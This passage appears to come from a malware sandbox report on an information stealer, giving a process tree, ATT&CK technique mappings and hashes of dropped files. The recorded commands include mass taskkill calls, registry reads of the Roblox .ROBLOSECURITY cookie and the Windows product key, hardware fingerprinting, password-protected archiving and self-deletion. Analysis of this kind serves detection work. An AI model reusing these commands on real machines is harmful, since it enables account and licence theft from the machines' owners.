    3⤵
    PID:4888
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 1948
      4⤵
      Kills process with taskkill
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4504"
    3⤵
    PID:5764
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4504
      4⤵
      Kills process with taskkill
      PID:2104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4036"
    3⤵
    PID:1596
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4036
      4⤵
      Kills process with taskkill
      PID:5552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2940"
    3⤵
    PID:5836
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2940
      4⤵
      Kills process with taskkill
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4640"
    3⤵
    PID:2576
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6032
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4640
      4⤵
      Kills process with taskkill
      PID:5504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 816"
    3⤵
    PID:5748
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 816
      4⤵
      Kills process with taskkill
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4552"
    3⤵
    PID:5572
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4552
      4⤵
      Kills process with taskkill
      PID:5628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5436
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5272"
    3⤵
    PID:4716
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5272
      4⤵
      Kills process with taskkill
      PID:800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2996"
    3⤵
    PID:5108
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2996
      4⤵
      Kills process with taskkill
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5324"
    3⤵
    PID:4992
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 5324
      4⤵
      Kills process with taskkill
      PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2516"
    3⤵
    PID:5596
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2516
      4⤵
      Kills process with taskkill
      PID:6124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe a -r -hp"mined" "C:\Users\Admin\AppData\Local\Temp\xsDFw.zip" *"
    3⤵
    PID:488
  - - C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI56522\rar.exe a -r -hp"mined" "C:\Users\Admin\AppData\Local\Temp\xsDFw.zip" *
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4232
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Desktop\79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4164
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5500

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:2904

C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
1⤵
- Checks system information in the registry
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3284
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=131.1.73.104 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff829651d18,0x7ff829651d24,0x7ff829651d30
  2⤵
  PID:4876
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --start-stack-profiler --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1996,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=1992 /prefetch:2
  2⤵
  PID:5796
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --start-stack-profiler --field-trial-handle=1896,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=2144 /prefetch:11
  2⤵
  PID:5352
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2428,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=2576 /prefetch:13
  2⤵
  PID:5384
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3472,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3484 /prefetch:1
  2⤵
  PID:2644
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3492,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=3652 /prefetch:1
  2⤵
  PID:696
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5008,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5032 /prefetch:14
  2⤵
  PID:5768
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3736,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:700
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5380,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5392 /prefetch:1
  2⤵
  PID:4912
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3332,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5308 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5720,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:1596
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5680,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=5640 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe
  "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-distillability-service --origin-trial-public-key=bYUKPJoPnCxeNvu72j4EmPuK7tr1PAC7SHh8ld9Mw3E=,fMS4mpO6buLQ/QMd+zJmxzty/VQ6B1EUZqoCU04zoRU= --brave_session_token=4641384517539513253 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=6104,i,9847513788768831893,9796041774182936056,262144 --variations-seed-version=main@a57acceeac76f9e1e94a52c2dc8e025872bf853c --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:6016

C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\elevation_service.exe
"C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\elevation_service.exe"
1⤵
PID:3824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Image File Execution Options Injection

T1546.012

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\BraveSoftware\Brave-Browser\Application\131.1.73.104\Installer\setup.exe

Filesize
4.3MB

MD5
94483ea960f9bee9044e0a8ca31fc33c

SHA1
39e29cde48af84b3efdf16ffeacdc35be3e0e1e5

SHA256
e308f70103afbfac265121f89759906299213e88fb9802352695f8260bd3d31c

SHA512
d189adf07c6715d38547bd8873234d16596970d671ba3fb9c222d6a9aa10a5fc7cdcc6cea6627c5b0031b93e60e6db18e45b2661532873f510151a9b3f1fcb94

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\CertificateRevocation\9459\crl-set

Filesize
628KB

MD5
026dc38d215947d4b8602eed3db0aa59

SHA1
6846a35c4474d5a077081707f0e5824e3612af3e

SHA256
6b47fd4ed5bce22feeee24ca68e54162403370bf8ce3a1192293931f482d69b5

SHA512
c098b3b41158f328f6715e2055e12a667d13392e6c41a4b880fb0e860eddf954c2ab23d9dd17e3af77c8b1a99c8f02d24481591594f7b7aca7514d1b0b48bbf7

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Crashpad\settings.dat

Filesize
40B

MD5
36b4459e1d1917cac27de1a63988712c

SHA1
1b4b66c87537ace28d6de544f1aed62b4739cdde

SHA256
72d17e0d2f364713fc69bd600476bfe25c83e8375c5bf04db18c0bd5a5ce7225

SHA512
8b0dced475d2156fc30680888ccdc6113c41a9e56a1ef912bd5680caaa2736737f8333a2ab9bfe6a53d5bc4ccdb702adb842d9c9bc539f3daf8a282da62030e4

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Crowd Deny\2024.12.19.1218\Preload Data

Filesize
16KB

MD5
3c97222c910c2aa1fab0c39a1c8d2b11

SHA1
c794a8758b4fa74c7aa9536effe9bfa774822e7a

SHA256
c7b91efdd09d75b47036e241eb55a238065ace2c26cd8f31328e8a9f4b4102b4

SHA512
3220065c655bf174c466d9ac03d3040e419f30d081983c23a757d2c0c5e4720aed2c71e88befc0d8b6987d6abd6a25289731d7f4fc9ed6348a1d762f67032153

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\49027d46-b937-4c60-9570-9fcc6ba9836a.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\8603b3a4-43d3-437a-ab7b-3c2058d8c860.tmp

Filesize
165KB

MD5
dceb0cfa9b61effc8788488f43747572

SHA1
c43235ebfd21469a747e8a264b67f874e0400cb9

SHA256
4f6f8abe6e2a6bbfea1c79b495019e80015343160d7fd99ecd0d428c9a8fd57a

SHA512
a4f5775c654fa4f31f53cb6fbab084939bd929feb95740b904045cd1f0a52c819e90876e56e66f7d1bb38db66fa0cb49c7365511f8346eec3cdc610e32b02c6b

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000002

Filesize
23KB

MD5
f837d382a885a07c34a3d4bf4f49373d

SHA1
68ddceef1d164a48d9d01d4a74f26b7897323229

SHA256
dd05e326cf8eac3b55acecf29c842ed73e6e6dd06491cf47f7e8800680ab3e33

SHA512
ef010d89971c4f69af7bf541430364c56245a5b63ed730fe628e49f48fa9e201c7f42b1e104eb14c3193bf79dd7ce20244f6b963e9996eb8308c0d61f444ece6

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000003

Filesize
23KB

MD5
75fb76ec35595f04717e8b3f1dc3ae2a

SHA1
91770c8b9979c8245519e9c5078ca10a47524169

SHA256
62553d159189834af73c9a6264704be5b2bee9a08da66a14768d8e5c6ffd2cdb

SHA512
4f05ec0c9a34ecacb19bd13aec6a15794951bd42b005986967b2d8b347cdce22fe8edb0b7d24d3e470416deb01fa69c0bf0fa5ae07eda3cefc26b0073dc9b62a

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000004

Filesize
18KB

MD5
f7efd201035aad80255784863b2bd554

SHA1
f384383fc005ed20568a79af8f7adfef0a94ec65

SHA256
8b78af6c426b6f73b9edcc2dc4e470d802731b5bfe592e94a6bab410a47ed684

SHA512
87554b44b2f025453f1be07b289681d3121c42479fd1937bef6a3620189f4c96adb5d9211ff6d4029885103f8b5c485de2e046ae0d8afaab35bb004651a97ba1

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000005

Filesize
22KB

MD5
2949c26c74d6758b0b24f8a087e85c74

SHA1
f4cc6e8482666d0efd96c4ac1b6f7b349437a226

SHA256
f87def0570c79571382758bbbed81d3c35c3417c0ee61854328e1e9f6aa2c761

SHA512
8c1866d924767a78590406be1757dc8a54115575015b3dd07f958493fb97aaddefb9082927f65d53ca28edc9960a6fdb05bcfc98a909aaaa016698c29d0a7b34

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000006

Filesize
30KB

MD5
634398de933ede056f9a37d3cb637d35

SHA1
554f40f77d189536622f60635e657bc0dea02382

SHA256
fdd66b3b8ea6f518350b6573da15806cff5bfe6ff5348ce70aca57d493349204

SHA512
68391239d302e1bc2d3a6313fd2778e7a73858455a319d9999e07f0b22c6d1d11df92844cb8fd5f9753ed9b87eedcd466fd1c42568a3516fadc00e82ab69a0ad

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000007

Filesize
20KB

MD5
3f98d00c8a68789143c2d403ba49a942

SHA1
8e7d1a3521f737417794699a3b8c37b66ff59595

SHA256
50f69eaf2312ad8a8ee7b6ac282709ee00c70f7f64484d1a7a5f14eb05ba101d

SHA512
fdcc670ded8941d4f442b1b9f93871662e3003cd09144eb7e0d5663e9bc59bed6221557504107ea6e54c12a33621e54ab52a5708c03a4af690d076e158f18bd5

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000008

Filesize
51KB

MD5
79d5b463805d57b178eaafe2f0ee1c95

SHA1
9eba550d6c319ad156f8660d6eb700683bf568af

SHA256
3d2aeea62706e2deac6c679037665e5763134264e267375e7f49714334be77a6

SHA512
a69e21331e8c45515e23a08a6685a850b07db4f8614bfd253da698c2f60ecf75d4875629a9e012724f382c2fe4a17ecc824d529ffc41c2d5304dd623eac1ceb4

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Cache\Cache_Data\f_000009

Filesize
16KB

MD5
2b7dff308fcd625e2d0d492ac65d881e

SHA1
199aaa1fe7955a2fe7967c114f267df12441e464

SHA256
900cecb6f5145539e859cf743b8e3583d562939fc60851665967044f50f6472e

SHA512
bd2cf4449f6c4e59889d3320216af9b3ad4b25eca4aa9abec3c4287b6f46cdbd21b4e00d46aed20e5571e9a52dd6e67842b7636c33c204e80734bbcd33c50828

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\CdmStorage.db

Filesize
160KB

MD5
e9fcb41b1fee21cd572a91184c8c23b8

SHA1
699099abc30e0d96c364a68f967bd2e26a1535b7

SHA256
68590788b1ba533d2f2ca85f81dc711238a37a095722823f5651177b38fc2b61

SHA512
30393a706900f3ab4f16ff326a7a9da68863ee254c2c9bb5d8bcfc95239f919b8bb3c392c064c1bfb86c23344769ded300f2c11284ecf89ee8a09d5284f968cd

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
410f9d35cbd1888fb297df95caa552ce

SHA1
901acd386bddd15f32756fb2421f5a2d77e2c233

SHA256
66952dbd62f97ab57c654c149f3edfdba7be1eb97b724f3168764af5c5fab38a

SHA512
920c5f801bdc10a5c926411f024b0820656194fe1aba1087f881259dda12186fe606ca26e095785cf7bbe7968a79c8afd2aeebcccfabb0c98de11f57209acc64

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
424ae6972532b023f663d355227292cd

SHA1
3e5dc65797c3b1d6559b8ce3cbc3f0a72f472f61

SHA256
0d981324a4faf4af0c9e63706de7dae4da5c56f7fde898962cf5ab4779f4e477

SHA512
52ee0976f3beea5141e891a30c7b0059827626597647755002d86479f5ab2005eaea2adf12eeebc5ff0c4f32d186cd9eed1ed77a092a4ca7c869fa2d36599a42

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
423551193261c3c46d1642c1e22a4368

SHA1
670afb7f049c108bbf540da405d51d85d0186de8

SHA256
c9b0b514d21673979942c13b2c81aa848a45d7fffe95999d4252a51f1b232ff2

SHA512
8ab9568dacefc57aac4ff63a77b90a5d00cf8263dfaf766b85183a0ffbc892dfb993bb392121d93909d2d10dc3bbeafbdf3bb87e178df805b411b31c7cdfb80e

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
556a88b3307256dba9d1703ff96be4ce

SHA1
3e99c30821bd1665f7349be7871b18e71eb186ce

SHA256
efd5f791f77e27165b3602507b0f324324accabbd76f80c55933d8abbaa4e2b7

SHA512
722e961519b96871d1ed3e8e25872eebb2b4ae768f05ef4aa6fc3170a4a2b38af8e9e8a5947ef9a46fbfc47445ebdcc12e7696a0f3f90a888d6b3ebbc4549ade

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
88e2ce4158ac3fe981fd121787b16681

SHA1
040baa676b1fb5d5600f423a519fa04b7645689f

SHA256
bcc95d196217d0071681cb729ed34ccfb1129366050f9045f31585c3e4d23ab3

SHA512
ab8125a622d095685198b3792c634fb179c8e87051925064f86d3e91bffc04f8bebdeabfcf84a9ebf3c2bcd48c7c33ebc8014088e9a77dec1f4569a64798ce67

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
4d9db60ba35cda4dee999cab0da4057e

SHA1
9e4be12a777aaf589a1f230dfaf638a31d03309f

SHA256
37ee471f494270f4e60a3c4251f0e1b1881c26868a4bf7e72c28cdf3606ab91c

SHA512
633fd70b43c8a3d153a793bb69d1e3bf7a83a05a9191b4d932324ac5021798dd2f97998b081d6db594ac9ef4bcccad9f8932d53ca3c3cfbb88b1ce3596747b08

Download Submit
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\DownloadMetadata

Filesize
152B

MD5
83055ff22c92f958614e8e0edf7ff9f6

SHA1
1741462cc315e81b02fd59ed302502d32606593d

SHA256
e7d077b2ca231f4ca2cf71eddfbd56d1ff1605523c71dd429d240941981d515d

SHA512
